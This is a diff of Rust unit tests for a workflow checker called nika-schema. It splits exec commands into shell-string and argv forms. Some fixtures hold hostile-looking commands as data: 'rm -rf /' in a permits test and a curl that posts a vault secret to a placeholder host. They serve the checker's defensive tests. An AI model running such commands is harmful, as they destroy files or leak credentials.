+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    exec: { shell: \"echo ${{ tasks.a.output.field }}\" }\n",
         );
         assert!(
             h.iter().any(|x| x.kind == "typing" && x.task == "a"),
@@ -844,7 +844,7 @@ mod tests {
         );
         // shallow consumption only → no typing hint
         let h2 = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output }}\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer: { prompt: \"x\", max_tokens: 10 }\n  - id: b\n    depends_on: [a]\n    exec: { shell: \"echo ${{ tasks.a.output }}\" }\n",
         );
         assert!(!h2.iter().any(|x| x.kind == "typing"), "{h2:?}");
     }
@@ -852,12 +852,12 @@ mod tests {
     #[test]
     fn effectful_workflow_without_permits_gets_the_boundary_hint() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { shell: \"echo hi\" }\n",
         );
         assert!(h.iter().any(|x| x.kind == "permits"), "{h:?}");
         // boundary declared → no hint
         let h2 = hints_of(
-            "nika: v1\nworkflow: w\npermits: { exec: true }\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n",
+            "nika: v1\nworkflow: w\npermits: { exec: true }\ntasks:\n  - id: t\n    exec: { shell: \"echo hi\" }\n",
         );
         assert!(!h2.iter().any(|x| x.kind == "permits"), "{h2:?}");
     }
@@ -1023,7 +1023,7 @@ mod tests {
     #[test]
     fn schema_d_task_gets_no_typing_hint() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        properties:\n          field: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.field }}\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        properties:\n          field: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { shell: \"echo ${{ tasks.a.output.field }}\" }\n",
         );
         assert!(!h.iter().any(|x| x.kind == "typing"), "{h:?}");
     }
@@ -1031,7 +1031,7 @@ mod tests {
     #[test]
     fn retried_exec_warns_at_least_once_semantics() {
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: deploy\n    retry: { max_attempts: 3 }\n    exec: { command: \"./deploy.sh\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: deploy\n    retry: { max_attempts: 3 }\n    exec: { shell: \"./deploy.sh\" }\n",
         );
         let hit = h.iter().find(|x| x.kind == "retry-effects").expect("hint");
         assert_eq!(hit.task, "deploy");
@@ -1053,7 +1053,7 @@ mod tests {
         // builtins carry documented idempotent semantics · max_attempts
         // 1 is no retry at all — none of these hint.
         let h = hints_of(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: ask\n    retry: { max_attempts: 3 }\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n  - id: save\n    retry: { max_attempts: 3 }\n    depends_on: [ask]\n    invoke:\n      tool: nika:write\n      args: { path: out.md, content: \"${{ tasks.ask.output }}\" }\n  - id: once\n    retry: { max_attempts: 1 }\n    depends_on: [save]\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: ask\n    retry: { max_attempts: 3 }\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n  - id: save\n    retry: { max_attempts: 3 }\n    depends_on: [ask]\n    invoke:\n      tool: nika:write\n      args: { path: out.md, content: \"${{ tasks.ask.output }}\" }\n  - id: once\n    retry: { max_attempts: 1 }\n    depends_on: [save]\n    exec: { shell: \"true\" }\n",
         );
         assert!(!h.iter().any(|x| x.kind == "retry-effects"), "{h:?}");
     }
@@ -1076,7 +1076,7 @@ mod tests {
         //   - referenced_secrets → {} / {""} / {"xyzzy"} (FOO not in set →
         //     the `referenced.contains(name)` guard fails → no hint)
         let h = hints_of(
-            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: prod/foo\ntasks:\n  - id: t\n    exec: { command: \"echo ${{ secrets.FOO }}\" }\n",
+            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: prod/foo\ntasks:\n  - id: t\n    exec: { shell: \"echo ${{ secrets.FOO }}\" }\n",
         );
         let hit = h
             .iter()
@@ -1094,7 +1094,7 @@ mod tests {
         // matching name would not, but a hardcoded set could) this would
         // also catch over-collection.
         let h = hints_of(
-            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: prod/foo\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n",
+            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: prod/foo\ntasks:\n  - id: t\n    exec: { shell: \"echo hi\" }\n",
         );
         assert!(!h.iter().any(|x| x.kind == "secrets-store"), "{h:?}");
     }
@@ -1121,7 +1121,7 @@ mod tests {
         // baseline the from_iter([""]) / from_iter(["xyzzy"]) mutations
         // violate (they would return a non-empty set here).
         let wf = wf_of(
-            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: a\ntasks:\n  - id: t\n    exec: { command: \"echo plain\" }\n",
+            "nika: v1\nworkflow: w\nsecrets:\n  FOO:\n    source: vault\n    key: a\ntasks:\n  - id: t\n    exec: { shell: \"echo plain\" }\n",
         );
         assert!(referenced_secrets(&wf).is_empty());
     }
@@ -1151,7 +1151,7 @@ mod tests {
 
         // exec: command + stdin + env values
         let exec = wf_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec:\n      command: \"run CMD\"\n      stdin: \"STDIN\"\n      env: { K: \"ENVVAL\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec:\n      shell: \"run CMD\"\n      stdin: \"STDIN\"\n      env: { K: \"ENVVAL\" }\n",
         );
         let f = task_text_fields(&exec.tasks[0].value);
         assert!(f.contains(&"run CMD"), "{f:?}");

--- a/crates/nika-schema/src/check/mod.rs
+++ b/crates/nika-schema/src/check/mod.rs
@@ -445,7 +445,7 @@ workflow: t
 tasks:
   - id: a
     depends_on: [ghost]
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
 ",
         );
         assert!(!r.conformance.is_empty());
@@ -473,7 +473,7 @@ nika: v1
 workflow: clean
 tasks:
   - id: a
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
 ",
         );
         assert!(r.is_clean());
@@ -568,10 +568,10 @@ workflow: cyclic
 tasks:
   - id: a
     depends_on: [b]
-    exec: { command: \"x\" }
+    exec: { command: [\"x\"] }
   - id: b
     depends_on: [a]
-    exec: { command: \"y\" }
+    exec: { command: [\"y\"] }
 ",
             FileId::new(0),
             ParseMode::Strict,
@@ -635,7 +635,7 @@ tasks:
         // Two independent check() runs over the same input must render
         // byte-identical JSON — pins the BTree-everywhere discipline (a
         // stray HashMap would randomize field/finding order run-to-run).
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\npermits: { exec: false, tools: [\"nika:read\"] }\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  - id: a\n    invoke: { tool: \"nika:raed\", args: { path: \"./in\" } }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"curl -d ${{ secrets.k }} x\" }\n  - id: c\n    depends_on: [b]\n    infer: { prompt: \"go ${{ tasks.b.output }}\", max_tokens: 50 }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\npermits: { exec: false, tools: [\"nika:read\"] }\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  - id: a\n    invoke: { tool: \"nika:raed\", args: { path: \"./in\" } }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"curl\", \"-d\", \"${{ secrets.k }}\", \"x\"] }\n  - id: c\n    depends_on: [b]\n    infer: { prompt: \"go ${{ tasks.b.output }}\", max_tokens: 50 }\n";
         let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let first = serde_json::to_string(&check(&wf)).expect("serialize");
         let second = serde_json::to_string(&check(&wf)).expect("serialize");
@@ -663,7 +663,7 @@ nika: v1
 workflow: clean
 tasks:
   - id: a
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
 ",
         );
         assert!(r.is_clean());

--- a/crates/nika-schema/src/check/native_first.rs
+++ b/crates/nika-schema/src/check/native_first.rs
@@ -240,9 +240,14 @@ mod tests {
     }
 
     fn exec_wf(command_yaml: &str) -> String {
-        format!(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: {{ command: {command_yaml} }}\n"
-        )
+        // D1 (0.103): the string form lives in `shell:`, argv in `command:` —
+        // the fixture router mirrors the field split the parser enforces.
+        let field = if command_yaml.trim_start().starts_with('[') {
+            "command"
+        } else {
+            "shell"
+        };
+        format!("nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: {{ {field}: {command_yaml} }}\n")
     }
 
     fn sole_native_hint(yaml: &str) -> Hint {
@@ -383,7 +388,7 @@ mod tests {
 
     #[test]
     fn on_finally_cleanups_are_scanned_too() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"make build\" }\n    on_finally:\n      - exec: { command: \"curl -X POST https://hooks.test/done\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"make\", \"build\"] }\n    on_finally:\n      - exec: { command: [\"curl\", \"-X\", \"POST\", \"https://hooks.test/done\"] }\n";
         let hints = hints_of(yaml);
         assert!(
             hints
@@ -403,17 +408,17 @@ workflow: site-asset
 model: mock/echo
 tasks:
   - id: crawl_site
-    exec: { command: "curl -s https://acme.test -o out/site.html" }
+    exec: { command: ["curl", "-s", "https://acme.test", "-o", "out/site.html"] }
   - id: upload_background
     depends_on: [crawl_site]
     exec:
       command: ["node", "workflows/site/bin/helper.mjs", "upload", "--file", "out/bg.png"]
   - id: render_background
     depends_on: [crawl_site]
-    exec: { command: "curl -X POST https://api.openai.com/v1/images/generations" }
+    exec: { command: ["curl", "-X", "POST", "https://api.openai.com/v1/images/generations"] }
   - id: write_manifest
     depends_on: [upload_background, render_background]
-    exec: { command: "jq -n '{done: true}' > out/manifest.json" }
+    exec: { shell: "jq -n '{done: true}' > out/manifest.json" }
 "#;
         let hints = hints_of(yaml);
         let by_task: Vec<(&str, &str)> = hints

--- a/crates/nika-schema/src/check/permits_fit.rs
+++ b/crates/nika-schema/src/check/permits_fit.rs
@@ -634,7 +634,7 @@ tasks:
 
     #[test]
     fn no_permits_block_no_escapes() {
-        let y = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"rm -rf /\" }\n";
+        let y = "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { shell: \"rm -rf /\" }\n";
         assert!(
             escapes_of(y).is_empty(),
             "absent permits = nothing to enforce"
@@ -643,7 +643,7 @@ tasks:
 
     #[test]
     fn exec_under_false_permit_escapes() {
-        let y = "nika: v1\nworkflow: w\npermits: { exec: false }\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n";
+        let y = "nika: v1\nworkflow: w\npermits: { exec: false }\ntasks:\n  - id: t\n    exec: { shell: \"echo hi\" }\n";
         let e = escapes_of(y);
         assert_eq!(e.len(), 1);
         assert_eq!(e[0].category, "exec");
@@ -771,9 +771,9 @@ workflow: w
 permits: { exec: ["git"] }
 tasks:
   - id: head_allowed
-    exec: { command: "GIT_PAGER=cat git log" }
+    exec: { shell: "GIT_PAGER=cat git log" }
   - id: head_denied
-    exec: { command: "FOO=1 rm -rf x" }
+    exec: { shell: "FOO=1 rm -rf x" }
 "#;
         let e = escapes_of(y);
         assert_eq!(e.len(), 2, "the string FORM escapes, not the head");
@@ -788,7 +788,7 @@ tasks:
         // Before this rule the dynamic head was waved through as « a
         // runtime concern » — but the runtime refuses the string form
         // under an allowlist before it ever looks at the head.
-        let y = "nika: v1\nworkflow: w\npermits: { exec: [\"git\"] }\nvars: { cmd: \"git\" }\ntasks:\n  - id: t\n    exec: { command: \"${{ vars.cmd }} status\" }\n";
+        let y = "nika: v1\nworkflow: w\npermits: { exec: [\"git\"] }\nvars: { cmd: \"git\" }\ntasks:\n  - id: t\n    exec: { shell: \"${{ vars.cmd }} status\" }\n";
         let e = escapes_of(y);
         assert_eq!(e.len(), 1, "string form under an allowlist escapes");
     }
@@ -1015,7 +1015,7 @@ workflow: w
 permits: { exec: ["sleep"] }
 tasks:
   - id: t
-    exec: { command: "sleep 5" }
+    exec: { shell: "sleep 5" }
 "#;
         let e = escapes(y);
         assert_eq!(e.len(), 1, "string form under an allowlist escapes");

--- a/crates/nika-schema/src/check/permits_infer.rs
+++ b/crates/nika-schema/src/check/permits_infer.rs
@@ -423,7 +423,7 @@ tasks:
       command: [\"ls\", \"-la\"]
   - id: sheller
     exec:
-      command: \"echo hi && ls\"
+      shell: \"echo hi && ls\"
   - id: thinker
     infer:
       prompt: p
@@ -559,7 +559,7 @@ tasks:
         // A dynamic SHELL string rides the shell-string arm (the form
         // decides before the head is even looked at).
         let r = infer_of(
-            "nika: v1\nworkflow: w\nvars: { c: \"git\" }\ntasks:\n  - id: t\n    exec: { command: \"${{ vars.c }} status\" }\n",
+            "nika: v1\nworkflow: w\nvars: { c: \"git\" }\ntasks:\n  - id: t\n    exec: { shell: \"${{ vars.c }} status\" }\n",
         );
         assert_eq!(r.permits.exec, Some(ExecPermit::Any), "dynamic → true");
         assert_eq!(r.notes.len(), 1);
@@ -568,13 +568,13 @@ tasks:
 
     #[test]
     fn literal_shell_string_never_infers_a_self_refusing_allowlist() {
-        // The trap this pins: `command: "git log"` used to infer
+        // The trap this pins: `shell: "git log"` used to infer
         // `exec: ["git"]` — a boundary the runtime then REFUSES for the
         // very task it was inferred from (shell-string under a Programs
         // allowlist is rejected wholesale at dispatch). The sound
         // inference is `exec: true` + a rewrite-to-argv note.
         let r = infer_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"git log\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { shell: \"git log\" }\n",
         );
         assert_eq!(
             r.permits.exec,
@@ -703,7 +703,7 @@ tasks:
         );
         // ExecPermit::Any — a dynamic command renders `exec: true`.
         assert_round_trips_clean(
-            "nika: v1\nworkflow: w\nvars: { c: \"git\" }\ntasks:\n  - id: t\n    exec: { command: \"${{ vars.c }} status\" }\n",
+            "nika: v1\nworkflow: w\nvars: { c: \"git\" }\ntasks:\n  - id: t\n    exec: { shell: \"${{ vars.c }} status\" }\n",
         );
     }
 

--- a/crates/nika-schema/src/check/reach.rs
+++ b/crates/nika-schema/src/check/reach.rs
@@ -569,7 +569,7 @@ mod tests {
     #[test]
     fn contradiction_on_one_task_is_dead() {
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 1, "{f:?}");
         assert_eq!(f[0].kind, GateFindingKind::DeadTask);
@@ -592,7 +592,7 @@ mod tests {
             write!(list, ", 'success'").expect("write to String is infallible");
         }
         let f = gates(&wf(&format!(
-            "  - id: a\n    exec: {{ command: \"true\" }}\n  - id: b\n    depends_on: [a]\n    when: ${{{{ tasks.a.status in [{list}] }}}}\n    exec: {{ command: \"true\" }}\n"
+            "  - id: a\n    exec: {{ command: [\"true\"] }}\n  - id: b\n    depends_on: [a]\n    when: ${{{{ tasks.a.status in [{list}] }}}}\n    exec: {{ command: [\"true\"] }}\n"
         )));
         assert!(
             !f.iter().any(|g| g.task == "b"),
@@ -604,7 +604,7 @@ mod tests {
     fn bad_status_literal_failed_is_caught_with_the_fix() {
         // the wild-caught class: 'failed' is not a status — 'failure' is
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failed' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failed' }}\n    exec: { command: [\"true\"] }\n",
         ));
         // == 'failed' never matches → ALSO dead
         assert_eq!(f.len(), 2, "{f:?}");
@@ -617,7 +617,7 @@ mod tests {
     fn ne_bad_literal_flags_vocabulary_but_lives() {
         // != 'failed' always holds — a bug, but the task CAN run
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status != 'failed' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status != 'failed' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 1, "{f:?}");
         assert_eq!(f[0].kind, GateFindingKind::BadStatusLiteral);
@@ -628,7 +628,7 @@ mod tests {
         // `a` has no when: and no on_error:skip — it can never be
         // `skipped`, so gating b on it is dead (the spec's own note)
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'skipped' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 1, "{f:?}");
         assert_eq!(f[0].kind, GateFindingKind::DeadTask);
@@ -638,7 +638,7 @@ mod tests {
     #[test]
     fn skip_route_makes_skipped_reachable() {
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n    on_error: { skip: true }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'skipped' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n    on_error: { skip: true }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -648,7 +648,7 @@ mod tests {
         // == 'failure' is the documented escalation pattern; cancelled
         // is always possible (operator stop) — neither is dead
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failure' }}\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'cancelled' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'failure' }}\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'cancelled' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -658,7 +658,7 @@ mod tests {
         // b is dead (contradiction) → b can only be skipped/cancelled →
         // c gated on b == 'success' is dead TOO, with the diagnostic
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'success' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 2, "{f:?}");
         assert!(f.iter().all(|g| g.kind == GateFindingKind::DeadTask));
@@ -674,7 +674,7 @@ mod tests {
     fn unknown_atoms_are_sound_not_dead() {
         // vars/env/output atoms → Unknown → never a dead-claim
         let f = gates(
-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { env: \"staging\" }\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ vars.env == 'production' && tasks.a.status == 'success' }}\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    when: \"${{ has(tasks.a.output.x) ? tasks.a.status == 'success' : false }}\"\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nvars: { env: \"staging\" }\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ vars.env == 'production' && tasks.a.status == 'success' }}\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    when: \"${{ has(tasks.a.output.x) ? tasks.a.status == 'success' : false }}\"\n    exec: { command: [\"true\"] }\n",
         );
         assert!(f.is_empty(), "{f:?}");
     }
@@ -682,7 +682,7 @@ mod tests {
     #[test]
     fn in_list_with_vocab_lives_and_bad_member_is_flagged() {
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status in ['success', 'skipped'] }}\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks.a.status in ['failed'] }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status in ['success', 'skipped'] }}\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks.a.status in ['failed'] }}\n    exec: { command: [\"true\"] }\n",
         ));
         // b: alive (in-list over vocab — skipped unreachable for a, but
         // success IS reachable → satisfiable). c: bad literal AND dead.
@@ -700,7 +700,7 @@ mod tests {
     #[test]
     fn when_false_literal_is_the_documented_never_pattern_not_a_finding() {
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: false\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: false\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -760,7 +760,7 @@ mod tests {
         // tasks['a'].status — the index form must hit the same analysis:
         // alive on 'failure', dead on impossible 'skipped'
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks['a'].status == 'failure' }}\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks['a'].status == 'skipped' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks['a'].status == 'failure' }}\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    when: ${{ tasks['a'].status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 1, "{f:?}");
         assert_eq!(f[0].task, "c");
@@ -771,7 +771,7 @@ mod tests {
     fn reversed_operand_order_is_the_same_atom() {
         // 'skipped' == tasks.a.status — literal first, same verdict
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'skipped' == tasks.a.status }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'skipped' == tasks.a.status }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert_eq!(f.len(), 1, "{f:?}");
         assert_eq!(f[0].kind, GateFindingKind::DeadTask);
@@ -783,7 +783,7 @@ mod tests {
         // c gated on b == 'skipped' is ALIVE: the never-pattern makes
         // skipped a real status downstream
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: false\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'skipped' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: false\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -837,7 +837,7 @@ mod tests {
     fn reversed_operand_bad_literal_is_flagged_too() {
         // 'failed' == tasks.a.status — literal first, vocabulary still checked
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'failed' == tasks.a.status }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ 'failed' == tasks.a.status }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(
             f.iter()
@@ -854,10 +854,10 @@ mod tests {
         let mut tasks = String::new();
         for i in 1..=6 {
             use std::fmt::Write as _;
-            let _ = write!(tasks, "  - id: u{i}\n    exec: {{ command: \"true\" }}\n");
+            let _ = write!(tasks, "  - id: u{i}\n    exec: {{ command: [\"true\"] }}\n");
         }
         tasks.push_str(
-            "  - id: z\n    depends_on: [u1, u2, u3, u4, u5, u6]\n    when: ${{ tasks.u1.status == 'success' && tasks.u1.status == 'failure' && tasks.u2.status == 'success' && tasks.u3.status == 'success' && tasks.u4.status == 'success' && tasks.u5.status == 'success' && tasks.u6.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "  - id: z\n    depends_on: [u1, u2, u3, u4, u5, u6]\n    when: ${{ tasks.u1.status == 'success' && tasks.u1.status == 'failure' && tasks.u2.status == 'success' && tasks.u3.status == 'success' && tasks.u4.status == 'success' && tasks.u5.status == 'success' && tasks.u6.status == 'success' }}\n    exec: { command: [\"true\"] }\n",
         );
         let f = gates(&wf(&tasks));
         assert_eq!(f.len(), 1, "{f:?}");
@@ -870,7 +870,7 @@ mod tests {
         // the |= S_SUCCESS paths must really add SUCCESS (a &= mutant
         // kills the chain and the downstream gates go dead)
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: true\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'success' }}\n    exec: { command: \"true\" }\n  - id: d\n    depends_on: [c]\n    when: ${{ tasks.c.status == 'success' }}\n    exec: { command: \"true\" }\n",
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: true\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [b]\n    when: ${{ tasks.b.status == 'success' }}\n    exec: { command: [\"true\"] }\n  - id: d\n    depends_on: [c]\n    when: ${{ tasks.c.status == 'success' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -923,10 +923,10 @@ mod tests {
         // goes DEAD. Asserting `c` is alive pins the default-gate runnable
         // path through a downstream status reference.
         let f = gates(&wf(
-            "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    \
-             depends_on: [a]\n    exec: { command: \"true\" }\n  - id: c\n    \
+            "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    \
+             depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: c\n    \
              depends_on: [b]\n    when: ${{ tasks.b.status == 'success' }}\n    \
-             exec: { command: \"true\" }\n",
+             exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }

--- a/crates/nika-schema/src/check/schema_lint.rs
+++ b/crates/nika-schema/src/check/schema_lint.rs
@@ -515,7 +515,7 @@ mod tests {
     #[test]
     fn unschema_d_tasks_are_skipped() {
         let f = findings_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n",
         );
         assert!(f.is_empty());
     }

--- a/crates/nika-schema/src/check/schema_typing.rs
+++ b/crates/nika-schema/src/check/schema_typing.rs
@@ -432,7 +432,7 @@ mod tests {
     /// An infer task with a 2-field object schema, consumed by `use_it`.
     fn schema_wf(consumer_expr: &str) -> String {
         format!(
